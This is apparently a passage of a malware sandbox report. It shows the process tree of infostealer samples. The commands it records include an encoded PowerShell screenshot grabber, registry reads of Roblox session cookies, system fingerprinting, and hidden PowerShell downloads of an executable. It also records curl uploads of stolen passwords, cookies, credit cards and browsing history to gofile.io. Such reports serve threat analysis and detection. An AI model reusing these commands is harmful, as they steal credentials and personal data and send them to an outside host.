JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        5⤵
        
        PID:6216
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        6⤵
        
        PID:6136
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xfbs1blz\xfbs1blz.cmdline"
        7⤵
        
        PID:7124
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABD2.tmp" "c:\Users\Admin\AppData\Local\Temp\xfbs1blz\CSC6F1275C1466A4B1FB51355725463AB7.TMP"
        8⤵
        
        PID:4976
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5652
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:6760
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:5800
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1200
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:5520
      - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        6⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:7112
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:3768
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:6520
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:6748
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5880
      - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        6⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:1184
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:6396
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:5064
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:6912
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5964
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:4844
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5760
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:2120
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        
        PID:2036
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        5⤵
        
        PID:2820
      - C:\Windows\system32\getmac.exe
        
        getmac
        6⤵
        
        PID:7048
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:4520
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:6060
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI65362\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\Hg7K3.zip" *"
        5⤵
        
        PID:5644
      - C:\Users\Admin\AppData\Local\Temp\_MEI65362\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI65362\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\Hg7K3.zip" *
        6⤵
        Executes dropped EXE
        
        PID:6116
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        5⤵
        
        PID:5652
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        6⤵
        
        PID:6940
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        5⤵
        
        PID:3844
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        6⤵
        
        PID:6884
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:2664
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:888
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        5⤵
        
        PID:7100
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3768
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4940
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:5160
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:6564
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        5⤵
        
        PID:4408
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        6⤵
        
        PID:5788
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6468
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9F7D.tmp\9F7E.tmp\9F7F.bat "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe""
      4⤵
      PID:6612
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/arht/releases/download/seht/archive.htm/' -outfile archive.htm"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:4220
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/ucm1/releases/download/iu1/shost.exe/' -outfile shost.exe"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:5800
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\archive.htm
        5⤵
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:1272
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffdfae03cb8,0x7ffdfae03cc8,0x7ffdfae03cd8
        6⤵
        
        PID:4692
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
        6⤵
        
        PID:6000
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
        6⤵
        
        PID:6528
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
        6⤵
        
        PID:1760
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
        6⤵
        
        PID:1888
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1
        6⤵
        
        PID:6800
    - - C:\Users\Admin\AppData\Local\Temp\shost.exe
        
        shost.exe
        5⤵
        Executes dropped EXE
        
        PID:2380
      - C:\Users\Admin\AppData\Local\Temp\shost.exe
        
        shost.exe
        6⤵
        Executes dropped EXE
        
        PID:6196
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
        7⤵
        
        PID:6596
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im firefox.exe /t /f
        8⤵
        Kills process with taskkill
        
        PID:6276
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile"
        7⤵
        
        PID:2900
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile
        8⤵
        
        PID:3900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"
        7⤵
        
        PID:6716
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile
        8⤵
        
        PID:400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile"
        7⤵
        
        PID:6592
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile
        8⤵
        
        PID:1772
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile"
        7⤵
        
        PID:4844
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile
        8⤵
        
        PID:1368
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile"
        7⤵
        
        PID:3352
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1888
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile
        8⤵
        
        PID:3240
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile"
        7⤵
        
        PID:1064
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile
        8⤵
        
        PID:6192
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile"
        7⤵
        
        PID:1036
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile
        8⤵
        
        PID:6408
    - - C:\Windows\system32\calc.exe
        
        calc.exe
        5⤵
        
        PID:1028
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe
    "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:6844
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5428
    - - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /q /i BWCInstaller.msi /norestart
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5476
- - C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VipToolMeta.exe
